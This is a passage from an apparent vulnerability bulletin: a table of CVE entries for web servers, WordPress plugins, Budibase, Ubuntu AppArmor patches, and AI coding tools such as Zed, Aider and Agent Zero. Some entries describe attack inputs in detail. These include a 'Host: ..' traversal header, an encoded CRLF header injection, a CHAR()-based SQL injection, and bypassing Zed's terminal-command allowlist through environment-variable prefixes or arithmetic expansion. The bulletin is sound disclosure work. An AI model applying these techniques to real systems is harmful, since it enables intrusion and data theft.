| xddxdd--bird-lg-go | bird-lg-go is a BIRD looking glass in Go. Prior to 1.4.5, the apiHandler (and similarly webHandlerTelegramBot) processes user-provided JSON payloads by directly using json.NewDecoder(r.Body).Decode(&request) without restricting the maximum read size. An unauthenticated remote attacker can stream an extremely large, endless JSON payload (e.g., several Gigabytes of padding) over a single TCP connection. Because Go's JSON decoder attempts to allocate memory for the entire parsed structure, this rapidly exhausts the host's physical RAM or container limits, leading to an unrecoverable fatal error: runtime: out of memory. This vulnerability is fixed in 1.4.5. | 2026-05-27 | 7.5 | CVE-2026-45047 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, when Algernon is asked for any URL path that resolves to a directory without an index file, DirPage walks upward through parent directories - past the configured server root - looking for a file named handler.lua to execute as the request handler. The loop terminates only after 100 ancestor steps or when filepath.Dir returns ., so on any absolute server-root path the search reaches the filesystem root (/ on Unix, drive letter on Windows). The first handler.lua it finds is loaded into the Lua interpreter with the full Algernon API exposed - including run3(), httpclient, os.execute, io.popen, PQ, MSSQL, raw filesystem access, and the userstate database. Any process that can write handler.lua anywhere in a parent directory of the server root obtains pre-authenticated remote code execution on the next HTTP request. This is reachable without authentication - the lookup happens before the permission check returns a hit (the perm system only gates URL prefixes, not the handler-resolution step), and any URL pointing at a directory without an index triggers the walk. On a fresh stock Algernon install the request GET / is enough. This vulnerability is fixed in 1.17.7. | 2026-05-26 | 9 | CVE-2026-45721 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.8, when algernon is started with --domain (or --letsencrypt, which silently turns on --domain at engine/flags.go:372), the request handler resolves the served directory by joining the configured --dir with the value of the client-supplied Host header. The join is performed by filepath.Join with no validation, so a Host: .. header walks one level above the document root. Subsequent file resolution then exposes everything in that parent directory - arbitrary file read, full directory listing, and, if any .lua file is present, server-side Lua execution. This vulnerability is fixed in 1.17.8. | 2026-05-26 | 8.2 | CVE-2026-48126 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, when Algernon is invoked with a single file path instead of a directory, singleFileMode is set to true and debugMode is forcibly enabled. debugMode activates the PrettyError renderer, which on any Lua or template error response dumps the absolute path of the file that errored, complete byte contents of that file, and exception or parser error text. This response is served with HTTP 200 OK to whoever sent the request that triggered the error. Any client able to reach the server and able to provoke a runtime error in the served script obtains the full server-side source of that script and of any sibling Lua data file consulted during the request. This vulnerability is fixed in 1.17.7. | 2026-05-26 | 7.5 | CVE-2026-45728 |
| yashpokharna2555--StudentManagementSystem | A weakness has been identified in yashpokharna2555 StudentManagementSystem cb2f558ddf8d19396de0f92abf2d224d46a0a203. The impacted element is an unknown function of the file /success.php. This manipulation of the argument User causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9469 |
| yashpokharna2555--StudentManagementSystem | A security vulnerability has been detected in yashpokharna2555 StudentManagementSystem cb2f558ddf8d19396de0f92abf2d224d46a0a203. This affects the function confirm_logged_in of the file student_trans.php. Such manipulation of the argument FIRST_NAME/Last_Name/EMAIL leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9470 |
| yashpokharna2555--StudentManagementSystem | A vulnerability was found in yashpokharna2555 StudentManagementSystem up to cb2f558ddf8d19396de0f92abf2d224d46a0a203. Affected by this issue is the function confirm_logged_in of the file /studentdel.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9474 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.44.0, when cpp-httplib's server parses an incoming request, it applies percent-decoding to every header value except Location and Referer. The validity check (is_field_value) is run before decoding, so encoded %0D%0A passes the check and is then expanded to a literal \r\n byte pair inside the stored header value. This vulnerability is fixed in 0.44.0. | 2026-05-29 | 9.9 | CVE-2026-45372 |
| Yot--Yot CMS | Yot CMS 3.3.1 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the aid and cid parameters. Attackers can send GET requests to index.php with crafted SQL payloads in the aid or cid parameters to extract database information including table and column names. | 2026-05-30 | 8.2 | CVE-2018-25425 |
| yudiz--WP Contact Form 7 DB Handler | The WP Contact Form 7 DB Handler plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Arbitrary File Deletion via SQL Injection and PHP Object Injection in versions up to and including 3.0. This is due to a missing nonce verification in the process_bulk_action() function, the nonce check is only executed when _wpnonce is present in the POST body, allowing it to be trivially bypassed by omitting the field, combined with the use of an unsanitized, unparameterized user-supplied value in a numeric SQL context (WHERE ID = $ID) and the unsafe deserialization of the query result's post_content field. An attacker can craft a CSRF page that tricks a logged-in administrator into triggering a UNION-based SQL injection payload (using CHAR() to avoid esc_sql quote-escaping) that returns a malicious serialized PHP array as post_content; upon deserialization, array values associated with keys containing 'ys_cfdbh_file' are used as file paths appended to the uploads directory path without any path traversal validation, and then passed to wp_delete_file(), allowing the attacker to delete arbitrary files on the server (e.g., wp-config.php, system files). | 2026-05-28 | 8.1 | CVE-2026-6455 |
| ZAYTECH--Smart Online Order for Clover | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Stored XSS.This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0. | 2026-05-27 | 7.1 | CVE-2026-42738 |
| ZAYTECH--Smart Online Order for Clover | Authentication Bypass Using an Alternate Path or Channel vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Authentication Bypass.This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0. | 2026-05-27 | 7.3 | CVE-2026-42745 |
| ZAYTECH--Smart Online Order for Clover | Insertion of Sensitive Information Into Sent Data vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Retrieve Embedded Sensitive Data.This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0. | 2026-05-27 | 7.3 | CVE-2026-42746 |
| zed-industries--zed | Zed is a code editor. Prior to 0.227.1, Zed builds SSH/WSL remote commands as a shell command string that starts with exec env ..., but environment variable keys are inserted without shell quoting or validation. If an attacker can control an environment variable key (for example via project terminal settings), shell expansions in the key (such as $(...)) are evaluated by the remote shell when a terminal is opened. This can lead to arbitrary command execution on the remote host under the victim user's account. This vulnerability is fixed in 0.227.1. | 2026-05-28 | 8.6 | CVE-2026-44461 |
| zed-industries--zed | Zed is a code editor. Prior to 0.229.0, Zed's terminal tool permission system can be bypassed by prepending environment variable assignments to allowlisted commands, hijacking program behavior (e.g., PAGER) to execute arbitrary code. This vulnerability is fixed in 0.229.0. | 2026-05-28 | 8.6 | CVE-2026-44463 |
| zed-industries--zed | Zed is a code editor. Prior to 0.227.1, Zed IDE executes arbitrary commands when opening a folder with a malicious .git/config file that abuses the core.fsmonitor Git configuration option. This allows an attacker to achieve Remote Code Execution (RCE) when a victim open a folder in untrusted mode. This vulnerability is fixed in 0.227.1. | 2026-05-28 | 8.6 | CVE-2026-44465 |
| zed-industries--zed | Zed is a code editor. Prior to 0.229.0, Zed's terminal tool permission system can be bypassed via bash arithmetic expansion $((...)), allowing execution of arbitrary commands nested inside an allowlisted command like echo. This vulnerability is fixed in 0.229.0. | 2026-05-28 | 8.6 | CVE-2026-44466 |
| ZTE--ZXUniPOS NDS-LTE | Access control failure means that an application does not effectively check user access permissions, so that unauthorized users can access system data beyond their permissions, such as viewing and modifying configuration information. | 2026-05-27 | 9.1 | CVE-2026-49002 |
| ZTE--ZXUniPOS NDS-LTE | An insecure password scheme refers to vulnerabilities arising from improper selection of encryption algorithms, inadequate key management, or flawed code implementation, which may lead to data leakage or tampering, such as hard-coded keys or the use of weak encryption algorithms. | 2026-05-27 | 7 | CVE-2026-49000 |
| zyddnys--manga-image-translator | manga-image-translator contains a remote code execution vulnerability in the shared API server mode due to unsafe deserialization of untrusted pickle data in the share.py module, where the /execute/{method_name} and /simple_execute/{method_name} endpoints deserialize attacker-controlled HTTP request bodies using pickle.loads(). A remote attacker can supply a crafted pickle payload to these endpoints to execute arbitrary code in the server process, resulting in full container compromise when running in the default Docker deployment as root. | 2026-05-29 | 9.8 | CVE-2026-10042 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10web--Photo Gallery by 10Web Mobile-Friendly Image Gallery | The Photo Gallery by 10Web - Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'order_by' parameter in all versions up to, and including, 1.8.40 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is exploitable by embedding a malicious shortcode in a post or draft, allowing the injected SQL to execute when the shortcode is rendered. | 2026-05-28 | 6.5 | CVE-2026-7048 |
| 3clyp50--agent-zero | Agent Zero before version 1.15 contains a path traversal vulnerability that allows unauthenticated attackers to read arbitrary files by supplying crafted paths to the image file serving endpoint, which relies solely on an extension allowlist while the path containment check is explicitly disabled. Attackers can request any file with an image extension readable by the process, including files outside the agent workspace, user home directories, and mounted volumes, and can also leverage symlink-based escapes due to the lack of path canonicalization in the path resolution logic. | 2026-05-27 | 6.5 | CVE-2026-47118 |
| 3clyp50--agent-zero | Agent Zero before version 1.15 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary JavaScript in the application origin by serving SVG files through the image_get API endpoint without Content-Security-Policy, X-Content-Type-Options, or Content-Disposition headers. Attackers can place a crafted SVG file containing script tags in any path readable by the agent-zero process and lure an authenticated user to the image_get endpoint, causing the browser to execute the malicious script, steal the csrf_token cookie, and perform unauthorized API calls on behalf of the victim. | 2026-05-27 | 6.1 | CVE-2026-47119 |
| 3uu--Shariff Wrapper | The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'headline' parameter in the [shariff] shortcode in all versions up to, and including, 4.6.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability occurs because the plugin uses a custom wp_kses implementation with permissive allowed HTML tags, and then performs a str_replace operation that injects HTML after sanitization, allowing event handlers to be introduced through the %total placeholder in the style attribute. | 2026-05-28 | 6.4 | CVE-2026-4334 |
| a3rev--a3 Lazy Load | The a3 Lazy Load plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.6 This is due to a regex bug in the _filter_videos() method that breaks HTML attribute quoting when processing crafted <video> elements, combined with unescaped output in the admin/views/form-data.php template. An authenticated attacker with Contributor-level access can insert a crafted <video> tag whose src attribute contains an embedded class=" substring that tricks the plugin's class-replacement regex into consuming an attribute-value closing quote. This shifts the HTML5 parser's quote boundary, promoting attacker-controlled text from inside a quoted attribute value into standalone event-handler attributes (autofocus, onfocus). The injected script executes in the browser of any user (including administrators) who views the post. | 2026-05-28 | 6.4 | CVE-2026-6427 |
| adamhathcock--sharpcompress | SharpCompress is a fully managed C# library to deal with many compression types and formats. In 0.47.4 and earlier, a path traversal vulnerability in IArchive.WriteToDirectory() allows a malicious archive to create directories outside the intended extraction root. For TAR archives, this can be escalated to arbitrary file writes by chaining with a symlink entry, giving a full write primitive on the target filesystem subject to the permissions of the running process. | 2026-05-26 | 5.9 | CVE-2026-44788 |
| Admidio--Admidio | Admidio 3.3.5 contains a cross-site request forgery vulnerability that allows low-privilege users to increase their permissions by exploiting improper origin checking. Attackers can craft malicious HTML forms targeting roles_function.php with parameters like rol_assign_roles, rol_approve_users, and rol_edit_user set to 1 to escalate privileges without authentication. | 2026-05-25 | 5.3 | CVE-2018-25370 |
| adnanmoqsood--Team Master A Modern WordPress Team Showcase | The Team Master - A Modern WordPress Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8870 |
| Ads by WPQuads--Ads by WPQuads | Improper Validation of Specified Quantity in Input vulnerability in Ads by WPQuads Ads by WPQuads quick-adsense-reloaded allows Input Data Manipulation.This issue affects Ads by WPQuads: from n/a through <= 3.0.2. | 2026-05-27 | 6.5 | CVE-2026-42732 |
| Ads by WPQuads--Ads by WPQuads | Improper Validation of Specified Quantity in Input vulnerability in Ads by WPQuads Ads by WPQuads quick-adsense-reloaded allows Manipulating Hidden Fields.This issue affects Ads by WPQuads: from n/a through <= 3.0.2. | 2026-05-27 | 6.5 | CVE-2026-42744 |
| Aider-AI--Aider | A vulnerability was identified in Aider-AI Aider 0.86.3. Affected is an unknown function of the file aider/args.py of the component Pre-commit Hook Handler. Such manipulation of the argument git-commit-verify leads to protection mechanism failure. The attack may be launched remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10174 |
| Aider-AI--Aider | A security flaw has been discovered in Aider-AI Aider 0.86.3. Affected by this vulnerability is the function editor_coder.run of the file auth.py of the component Architect Mode. Performing a manipulation results in code injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10175 |
| Aider-AI--Aider | A weakness has been identified in Aider-AI Aider 0.86.3. Affected by this issue is some unknown functionality of the component Code Generation Workflow. Executing a manipulation can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10176 |
| Aider-AI--Aider | A security vulnerability has been detected in Aider-AI Aider 0.86.3. This affects the function requests.get of the file api_docs.py of the component AWS EC2 Metadata Endpoint. The manipulation leads to server-side request forgery. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. It is suggested to install a patch to address this issue. The pull request to fix this issue awaits acceptance. | 2026-05-31 | 6.3 | CVE-2026-10177 |
| analogwp--Style Kits for Elementor | The Style Kits - Advanced Theme Styles for Elementor, Elementor Kits & Elementor Patterns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '/wp-json/agwp/v1/tokens/save' endpoint kit title parameter in versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping in an admin attribute context. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-6565 |
| Armcode--Arm Whois | Arm Whois 3.11 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized input string. Attackers can paste a malicious buffer of 700 bytes into the IP address or domain input field to trigger a denial of service condition. | 2026-05-30 | 6.2 | CVE-2018-25423 |
| Assimp--Assimp | A vulnerability was found in Assimp up to 6.0.4. This affects the function glTFCommon::CopyValue in the library glTFCommon.h of the component 4x4 Matrix Parser. Performing a manipulation results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been made public and could be used. The project tagged the reported issue as bug. | 2026-05-31 | 5.3 | CVE-2026-10200 |
| authlib--authlib | Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to 1.6.12 and 1.7.1, an unauthenticated open redirect in Authlib's OpenIDImplicitGrant and OpenIDHybridGrant authorization endpoint lets a remote attacker cause the authorization server to issue an HTTP 302 to an attacker-chosen URL by submitting an authorization request that omits the openid scope. This vulnerability is fixed in 1.6.12 and 1.7.1. | 2026-05-27 | 6.1 | CVE-2026-44681 |
| Autodesk--3ds Max | A maliciously crafted PAR file, when parsed through Autodesk 3ds Max, can force a NULL Pointer Dereference vulnerability. Successful exploitation may cause the application to crash, leading to a denial-of-service condition. | 2026-05-26 | 5.3 | CVE-2026-7450 |
| Autodesk--3ds Max | A maliciously crafted WRL file, when parsed through Autodesk 3ds Max, can cause a Stack Exhaustion vulnerability, leading to a denial-of-service condition. | 2026-05-26 | 5.3 | CVE-2026-7453 |
| Averta--Master Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Averta Master Slider allows DOM-Based XSS. This issue affects Master Slider: from n/a through 3.10.8. | 2026-05-27 | 6.5 | CVE-2026-48968 |
| ays-pro--Poll Maker by AYS Versus Polls, Anonymous Polls, Image Polls | The Poll Maker - Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to and including 6.3.7. This is due to insufficient access controls on the 'ays_poll_get_user_information' AJAX action, which serializes and returns the complete WP_User object - including the user_pass (bcrypt password hash), user_email, user_login, user_registered, roles, and all capabilities - without any nonce verification or capability check beyond is_user_logged_in(). This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive account data including their own password hash, which WordPress does not expose through any of its standard interfaces and which can be leveraged for offline password-cracking attacks. | 2026-05-29 | 4.3 | CVE-2026-8995 |
| BankPro E-Service Technology--Service Center | Service Center developed by BankPro E-Service Technology has an Insecure Direct Object Reference vulnerability, allowing authenticated remote attackers to modify the parameter of a specific query function to access other users' EC order details. | 2026-05-29 | 6.5 | CVE-2026-9493 |
| Bdtask--Multi-Store Inventory Management System | A security flaw has been discovered in Bdtask Multi-Store Inventory Management System 1.0. The affected element is the function Upload of the file application/modules/dashboard/controllers/Module.php of the component Component Module. The manipulation of the argument module results in unrestricted upload. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. | 2026-05-31 | 6.3 | CVE-2026-10172 |
| Bdtask--Multi-Store Inventory Management System | A vulnerability was found in Bdtask Multi-Store Inventory Management System 1.0. The impacted element is the function accounts_report_search of the file application/modules/accounts/controllers/Accounts.php of the component Accounts Report Handler. Performing a manipulation of the argument dtpToDate results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2026-05-30 | 4.7 | CVE-2026-10155 |
| Benbodhi--SVG Support | Missing Authorization vulnerability in Benbodhi SVG Support allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SVG Support: from n/a through 2.5.14. | 2026-05-27 | 4.3 | CVE-2026-48973 |
| bensibley--Independent Analytics WordPress Analytics Plugin | The Independent Analytics plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.14.9. This is due to a public tracking route at /wp-json/iawp/search that accepts attacker-controlled referrer_url values when the signature matches, combined with a scheduled favicon fetcher that performs unrestricted cURL requests to stored domains. The signature validation is insufficient because the signature is embedded in publicly-accessible JavaScript and the salt is static per site, allowing attackers to extract valid signatures. The favicon downloader uses raw cURL functions without any SSRF protection mechanisms (no localhost blocking, no private network filtering, and does not use WordPress's wp_safe_remote_* functions). This makes it possible for unauthenticated attackers to inject malicious referrer domains into the database and trigger server-side requests to arbitrary hosts including internal services. | 2026-05-28 | 6.5 | CVE-2026-5737 |
| bitform--BitForm Data management solution for WordPress | The BitForm plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bitform' shortcode in versions up to, and including, 1.1.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes ('width' and 'height') in the Shortcode::shortcode() function, which are interpolated directly into the 'style' attribute of an <iframe> element. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8891 |
| Bizswoop--Account Manager for WooCommerce | Missing Authorization vulnerability in Bizswoop Account Manager for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Account Manager for WooCommerce: from n/a through 2.1.2. | 2026-05-27 | 4.3 | CVE-2022-41656 |
| blitz-js--blitz | A weakness has been identified in blitz-js blitz up to 3.0.2 on GitHub. This impacts an unknown function of the file packages/generator/templates/app/src/app/auth/components/LoginForm.tsx of the component Sign-in. This manipulation of the argument Next causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 4.3 | CVE-2026-9520 |
| bPlugins--Tiktok Feed | Missing Authorization vulnerability in bPlugins Tiktok Feed allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tiktok Feed: from n/a through 1.0.24. | 2026-05-26 | 4.3 | CVE-2026-24520 |
| bradyholt--jQuery googleslides | The jQuery googleslides plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'googleslides' shortcode in all versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping on user supplied attributes (userid, albumid, authkey, imgmax, maxresults, random, caption, albumlink, time, and fadespeed) in the googleslides_handler() function, which interpolates the attribute values directly into single-quoted HTML attributes without using esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8866 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, the V1 Views API (POST /api/views) accepts a calculation parameter from the request body that is interpolated directly into a CouchDB reduce function definition without validation. Although an internal SCHEMA_MAP object defines the valid calculation types (sum, count, stats), no actual validation is performed against this map before the value is used in string interpolation. A user with Builder permissions can inject arbitrary JavaScript code that will be executed within the CouchDB JavaScript engine when the view is queried. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 6.5 | CVE-2026-45719 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.35.4, the buildMatcherRegex() / matches() functions in packages/backend-core/src/middleware/matchers.ts route patterns are compiled into unanchored regular expressions and tested against ctx.request.url, which includes the full query string. The CSRF middleware in the Budibase Worker uses this matching system to decide whether to skip CSRF token validation. An unauthenticated attacker can forge state-changing cross-origin requests against any Worker API endpoint by injecting a public route pattern into the query string, causing the CSRF middleware to skip token validation entirely. This allows actions such as sending admin invites, modifying global configuration, and managing users without a valid CSRF token. This vulnerability is fixed in 3.35.4. | 2026-05-27 | 6.5 | CVE-2026-48147 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, the row action trigger endpoint (POST /api/tables/:sourceId/actions/:actionId/trigger) fails to validate that the user-supplied rowId is within the scope of the view's row filters. A user with access to a filtered view can trigger row actions on any row in the underlying table, including rows explicitly excluded by the view's security filters. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 5.4 | CVE-2026-45718 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.2, the public API role unassignment endpoint (POST /api/public/v1/roles/unassign) updates user documents in CouchDB but does not invalidate the corresponding Redis user cache entries. Because the authentication middleware resolves user identity and permissions from this cache (TTL: 3600 seconds), a user whose admin, builder, or app-level roles have been revoked via the public API retains those privileges for up to 1 hour. This vulnerability is fixed in 3.38.2. | 2026-05-27 | 4.2 | CVE-2026-46424 |
| bugsink--bugsink | Bugsink is a self-hosted error tracking tool. Prior to 2.1.3, Bugsink's webhook URL validation could be (partially) bypassed because of a mismatch in URL parsing. The original validation logic parsed webhook URLs with Python's urllib.parse.urlparse, then sent the request with requests.post. For malformed inputs involving backslashes and @, those components can disagree about where the authority ends and which hostname is the real target. A URL may therefore appear to target an allowlisted public hostname during validation, while the HTTP client actually connects to a different host. This vulnerability is fixed in 2.1.3. | 2026-05-26 | 4.3 | CVE-2026-44502 |
| bugsink--bugsink | Bugsink is a self-hosted error tracking tool. Prior to 2.2.0, Bugsink resolved sourcemaps and debug files by debug ID without scoping that lookup to the project that owned the uploaded metadata. An authenticated user with access to one project could cause event processing in that project to use sourcemap/debug-file metadata uploaded for another project in the same Bugsink instance, if the same debug ID was referenced. This vulnerability is fixed in 2.2.0. | 2026-05-26 | 4.3 | CVE-2026-47728 |
| c-rick--jimeng-mcp | A vulnerability has been found in c-rick jimeng-mcp 1.10.0. Affected by this vulnerability is the function getFileContent/uploadCoverFile/generateImage/generateVideo of the file src/api.ts. The manipulation of the argument filePath leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 6.3 | CVE-2026-9473 |
| Canon Inc.--Canon PIXUS iX6800 Series CUPS Printer Driver for macOS | Improper handling of symbolic links in the installer of CUPS Printer Driver for macOS(*) may allow a local attacker with login privileges to exploit a specially crafted symbolic link during installation to modify permissions of directories for which they would not normally have authorization. *:Canon PIXUS iX6800 Series CUPS Printer Driver for macOS Version 16.91.0.0 or earlier (Japan) Canon PIXMA MG2500 Series and iX6800 Series CUPS Printer Driver for macOS Version 16.91.0.0 or earlier (US and Europe) | 2026-05-29 | 5 | CVE-2026-6892 |
| Canon Inc.--My Image Garden for macOS | Improper handling of symbolic links in the installer of My Image Garden for macOS Version 3.6.8 or earlier may allow a local attacker with login privileges to exploit a specially crafted symbolic link during installation to modify permissions of files for which they would not normally have authorization. | 2026-05-28 | 5 | CVE-2026-6891 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain AppArmor SAUCE patches which incorrectly attempt to free a pointer which was not previously kmalloc()d, while at the same time leaking allocated memory. The bug can be triggered by an unprivileged local user and can result in the corruption of slab metadata and could lead to resource exhaustion. | 2026-05-28 | 6.1 | CVE-2026-47328 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain SAUCE patches with a memory leak in the handling of big responses to AppArmor notifications. The bug can be triggered by an unprivileged local user. The memory leak could lead to resource exhaustion. | 2026-05-28 | 5.5 | CVE-2026-47326 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain AppArmor SAUCE patches which incorrectly validate the size of an internal structure, leading to an out-of-bounds read in notification handling code. The bug can be triggered by an unprivileged local user and can result in information disclosure from adjacent slab objects. | 2026-05-28 | 5.5 | CVE-2026-47332 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain AppArmor SAUCE patches which incorrectly sleep while holding a spinlock in notification handling code. The bug can be triggered by an unprivileged local user and can result in kernel panic or deadlock. | 2026-05-28 | 5.5 | CVE-2026-47334 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8 contains SAUCE patches with a possible NULL pointer dereference in the handling of AppArmor notifications. The bug can be triggered by an unprivileged local user. This can lead to a kernel panic. | 2026-05-28 | 5.5 | CVE-2026-47335 |
| celloexpressions--Content Slideshow | The Content Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8873 |
| changmingxie--tcc-transaction | A flaw has been found in changmingxie tcc-transaction up to 2.1.0. This issue affects the function Fastjson.parseObject of the component Fastjson AutoType REST API. This manipulation causes deserialization. It is possible to initiate the attack remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9497 |
| chatwoot--chatwoot | Chatwoot is a customer engagement suite. From 2.14.0 to before 4.13.0, a Pre-Account Takeover (Pre-ATO) vulnerability existed in Chatwoot's authentication flow. Because email confirmation was not enforced before an account became usable, an attacker could pre-register an email address they did not own and set a password. If the legitimate owner of that email later signed in to Chatwoot using Google OAuth (or another OmniAuth provider), the OAuth flow silently confirmed the existing account without invalidating the attacker's pre-set credentials. The attacker could then continue to log in with the password they had originally chosen and access any data the victim subsequently entered into the dashboard, including PII, API keys, and other sensitive information. This vulnerability is fixed in 4.13.0. | 2026-05-26 | 6.8 | CVE-2026-44707 |
| checkpoint--Quantum Security Gateway | When the DLP is active, the UserCheck Web Portal contains an input-handling issue in the UserChoice flow. Under specific conditions, an attacker who can access the UserCheck Ask page could attempt to manipulate the Security Gateway's stored DLP/UserCheck incident information. This could lead to disruptions such as loss of stored incident entries, incorrect handling of pending approvals, or resource impact if the issue is abused repeatedly. Exposure is reduced if the UserCheck Portal is not accessible from untrusted networks. | 2026-05-26 | 5.6 | CVE-2026-48134 |
| checkpoint--Quantum Security Gateway | A Check Point HTTP-based service can incorrectly handle malformed HTTP requests. The issue is related to HTTP request parsing and validation. | 2026-05-26 | 5.3 | CVE-2026-48135 |
| checkpoint--Quantum Security Management | When Compliance is enabled on Check Point Multi-Domain Management, an authenticated administrator with read-write access to one Management Domain (CMA) can modify stored metadata associated with Compliance Best Practices in another Management Domain, where the administrator has no access permissions, bypassing Role-Based Access Control (RBAC). | 2026-05-26 | 4.1 | CVE-2026-48136 |
| clorith--Enable jQuery Migrate Helper | The Enable jQuery Migrate Helper plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `downgrade_jquery_version()` function in all versions up to, and including, 1.4.1. This is due to the function only verifying a nonce without checking user capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to downgrade the site-wide jQuery version from 3.7.1 to the legacy 1.12.4-wp release, which has knowns security vulnerabilities. | 2026-05-27 | 6.5 | CVE-2026-3279 |
